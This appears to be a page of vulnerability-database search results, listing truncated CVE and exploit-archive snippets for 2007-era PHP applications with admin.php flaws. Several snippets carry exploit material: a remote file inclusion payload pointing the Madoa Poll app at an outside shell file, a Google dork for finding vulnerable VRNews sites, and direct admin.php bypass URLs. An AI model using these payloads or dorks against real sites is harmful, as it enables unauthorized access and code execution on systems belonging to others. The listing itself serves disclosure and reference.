1593 matches found
CVE-2007-5453
CVE-2007-5453 concerns Php-Stats 0.1.9.2, which contains multiple eval-injection vulnerabilities. The issue allows remote authenticated administrators to execute arbitrary code by injecting PHP sequences into the php-stats-options record in the _options table, which is subsequently evaluated via ...
CVE-2007-5032
Cross-site request forgery (CSRF) vulnerability in admin.php in Francisco Burzi PHP-Nuke allows remote attackers to add administrative accounts via an AddAuthor action with modified add_name and add_radminsuper parameters...
CVE-2007-5032
CVE-2007-5032 is a cross-site request forgery (CSRF) in admin.php of Francisco Burzi's PHP-Nuke. An attacker can add administrative accounts by sending a request that abuses AddAuthor with crafted add_name/add_radminsuper parameters. Documented impact includes partial confidentiality, integrity, ...
Code injection
Direct static code injection vulnerability in includes/admin/sub/confappearence.php in Shop-Script FREE 2.0 and earlier allows remote attackers to inject arbitrary PHP code into cfg/appearence.inc.php via a saveappearence action in admin.php, as demonstrated with the (1) productscount, (2) colscount,...
Code injection
admin.php in Shop-Script FREE 2.0 and earlier sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to access the admin panel...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in phpFFL 1.24 allow remote attackers to execute arbitrary PHP code via a URL in the PHPFFLFILEROOT parameter to (1) admin.php, (2) custompages.php, (3) draft.php, (4) faq.php, (5) leagues.php, (6) livedraft.php, (7) login.php, (8) myteam.php, (9) profile.php, (10)...
CVE-2007-4933
Direct static code injection vulnerability in includes/admin/sub/confappearence.php in Shop-Script FREE 2.0 and earlier allows remote attackers to inject arbitrary PHP code into cfg/appearence.inc.php via a saveappearence action in admin.php, as demonstrated with the (1) productscount, (2) colscount,...
CVE-2007-4932
Shop-Script FREE 2.0 and earlier is affected by CVE-2007-4932: admin.php fails to exit after a redirect when administrative credentials are missing, allowing an unauthenticated remote attacker to access the admin panel. The NVD entry confirms the bypass/panel access impact, and Nessus notes a lik...
CVE-2007-4610
Unrestricted file upload vulnerability in config/upload.php in Moonware (aka Dale Mooney Gallery) allows remote attackers to upload and execute arbitrary PHP files in images/, possibly related to config/admin.php...
Sql injection
SQL injection vulnerability in Admin.php in Olate Download (od) 3.4.1 allows remote attackers to execute arbitrary SQL commands via an OD3_AutoLogin cookie...
CVE-2007-4421
SQL injection vulnerability in Admin.php in Olate Download (od) 3.4.1 allows remote attackers to execute arbitrary SQL commands via an OD3_AutoLogin cookie...
CVE-2007-4421
CVE-2007-4421 affects Olate Download (od) 3.4.1. The vulnerability is a SQL injection in Admin.php exploitable via an OD3_AutoLogin cookie, enabling remote attackers to execute arbitrary SQL commands. Root cause is the unsafely handled cookie value in the Admin.php flow, leading to compromised da...
Madoa Poll v1.1 Remote File Include Vulnerabilities
Madoa Poll v1.1 Remote File Include Vulnerabilities ilker kandemir ilkerkandemiratmynet.com info: / Her$ey Vatan icin / Download: http://www.finnermark.se/madoa/Madoapoll11.zip TnX.: Ajann, Dumenci, H0tTurk, Str0ke Bug: require $Madoa . "config.php"; Exploit: index.php?Madoa=http://sheel.txt?...
CVE-2007-3611
admin.php in VRNews 1.1.1, and possibly other 1.x versions, does not require authentication, which allows remote attackers to perform certain administrative actions via a direct request with a (1) edit, (2) add, (3) config, or (4) del value in the act parameter...
CVE-2007-3611
VRNews 1.1.1 (admin.php) is vulnerable to an unauthenticated remote administrative action due to a direct request parameter (act) that allows actions such as edit, add, config, or del. The root cause is lack of authentication for these actions, enabling attackers to perform administrative operati...
VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability
No description provided by source. VRNews v1.x = /VRNews/admin.php Permission Found by: R4M! - [email protected] Dork: intitle:"vrnews v1" Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm Example: 1. /VRNews/admin.php?act=edit 2. /VRNews/admin.php?act=add 3. /VRNews/admin.php?act=confi...
VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability
Exploit for unknown platform in category web applications. VRNews 1.1.1 admin.php Remote Permission Bypass Vulnerability. VRNews v1.x = /VRNews/admin.php Permission Found...
VRNews 1.1.1 - admin.php Remote Security Bypass
VRNews 1.1.1 - admin.php Remote Security Bypass VRNews v1.x = /VRNews/admin.php Permission Found by: R4M! - [email protected] Dork: intitle:"vrnews v1" Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm Example: 1. /VRNews/admin.php?act=edit 2. /VRNews/admin.php?act=add 3...